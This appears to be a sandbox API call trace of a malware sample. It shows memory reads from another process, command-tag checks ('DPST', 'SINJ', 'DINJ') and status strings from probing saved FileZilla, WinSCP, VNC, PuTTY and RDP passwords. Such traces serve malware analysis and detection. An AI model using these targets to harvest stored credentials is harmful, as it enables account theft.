	[0234.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778708
	[0234.459] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.459] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.459] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.459] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778708) returned 1
	[0234.459] Sleep (dwMilliseconds=0xbb8) 
	[0234.469] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.469] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0234.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225c10
	[0234.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22eb8b0
	[0234.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0234.469] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.469] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efac6, lpBuffer=0x225c10, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225c10*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff8a0
	[0234.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c10, cbMultiByte=-1, lpWideCharStr=0x22ff8a0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0234.469] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef9f6, lpBuffer=0x22eb8b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22eb8b0*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0234.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22eb8b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36
	[0234.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa540
	[0234.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22eb8b0, cbMultiByte=-1, lpWideCharStr=0x22aa540, cchWideChar=36 | out: lpWideCharStr="Filezilla: no sitemanager.xml found") returned 36
	[0234.469] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef7b4, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d30
	[0234.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x2777d30, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.470] SetEvent (hEvent=0x49c) returned 1
	[0234.470] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225c10) returned 1
	[0234.470] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eb8b0) returned 1
	[0234.470] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0234.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c40
	[0234.470] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0234.470] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0234.470] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0234.470] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.470] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0234.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff5d0
	[0234.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27781e0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdb8) returned 0x63c
	[0234.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777ce0
	[0234.471] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.471] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.471] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.471] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777ce0) returned 1
	[0234.471] Sleep (dwMilliseconds=0xbb8) 
	[0234.485] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.485] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0234.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0234.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0234.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0234.485] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.485] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efabc, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff300
	[0234.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x22ff300, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0234.485] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef9d7, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0234.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30
	[0234.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7470
	[0234.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x22c7470, cchWideChar=30 | out: lpWideCharStr="FileZilla passwords are empty") returned 30
	[0234.486] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef7b4, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27383a8
	[0234.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x27383a8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.486] SetEvent (hEvent=0x49c) returned 1
	[0234.486] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0234.486] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0234.486] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0234.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738498
	[0234.486] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0234.486] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0234.486] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0234.487] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.487] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0234.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffea0
	[0234.487] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x231efc0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd98) returned 0x658
	[0234.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27384c0
	[0234.487] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.487] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.487] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.487] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27384c0) returned 1
	[0234.487] Sleep (dwMilliseconds=0xbb8) 
	[0234.501] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.501] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0234.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0234.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0234.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0234.501] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.501] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef9d3, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe28
	[0234.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x22ffe28, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0234.501] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa3b, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0234.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37
	[0234.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa648
	[0234.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x22aa648, cchWideChar=37 | out: lpWideCharStr="Winscp: failed to open registry hive") returned 37
	[0234.502] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef2d8, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738448
	[0234.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x2738448, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.502] SetEvent (hEvent=0x49c) returned 1
	[0234.503] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0234.503] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0234.503] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0234.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27383f8
	[0234.503] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0234.503] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0234.503] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0234.503] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.503] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0234.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe40
	[0234.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27384c0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd8c) returned 0x65c
	[0234.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737d68
	[0234.504] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.504] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.504] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.504] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737d68) returned 1
	[0234.504] Sleep (dwMilliseconds=0xbb8) 
	[0234.548] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.548] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0234.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0234.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2745158
	[0234.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0234.548] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.548] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa73, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9c0
	[0234.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x22ff9c0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0234.548] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa8e, lpBuffer=0x2745158, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2745158*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0234.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2745158, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24
	[0234.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c71e8
	[0234.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2745158, cbMultiByte=-1, lpWideCharStr=0x22c71e8, cchWideChar=24 | out: lpWideCharStr="VNC passwords are empty") returned 24
	[0234.548] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef9c0, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738470
	[0234.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x2738470, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.549] SetEvent (hEvent=0x49c) returned 1
	[0234.550] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0234.550] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0234.550] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0234.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27383d0
	[0234.550] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0234.550] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0234.550] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0234.550] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.550] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0234.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff18
	[0234.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2738420, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdac) returned 0x624
	[0234.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0234.551] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.551] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.551] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.551] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0234.551] Sleep (dwMilliseconds=0xbb8) 
	[0234.576] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.576] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0234.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0234.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2745158
	[0234.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0234.576] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.576] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa6d, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9f0
	[0234.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x22ff9f0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0234.577] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa8a, lpBuffer=0x2745158, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2745158*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0234.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2745158, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26
	[0234.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7308
	[0234.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2745158, cbMultiByte=-1, lpWideCharStr=0x22c7308, cchWideChar=26 | out: lpWideCharStr="PuTTY passwords are empty") returned 26
	[0234.577] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef9bc, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fe8
	[0234.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x2737fe8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.577] SetEvent (hEvent=0x49c) returned 1
	[0234.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0234.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0234.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0234.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738010
	[0234.578] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0234.578] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0234.578] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0234.578] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.578] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0234.578] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7518
	[0234.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2737fc0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd94) returned 0x5f0
	[0234.579] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737e30
	[0234.579] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.579] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.579] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.579] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e30) returned 1
	[0234.579] Sleep (dwMilliseconds=0xbb8) 
	[0234.594] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.594] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0234.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0234.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2745158
	[0234.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0234.594] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.594] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa72, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75c0
	[0234.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x22b75c0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0234.594] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa8d, lpBuffer=0x2745158, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2745158*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0234.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2745158, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24
	[0234.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6f18
	[0234.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2745158, cbMultiByte=-1, lpWideCharStr=0x22c6f18, cchWideChar=24 | out: lpWideCharStr="RDP passwords are empty") returned 24
	[0234.594] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef9c0, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737b88
	[0234.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x2737b88, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.594] SetEvent (hEvent=0x49c) returned 1
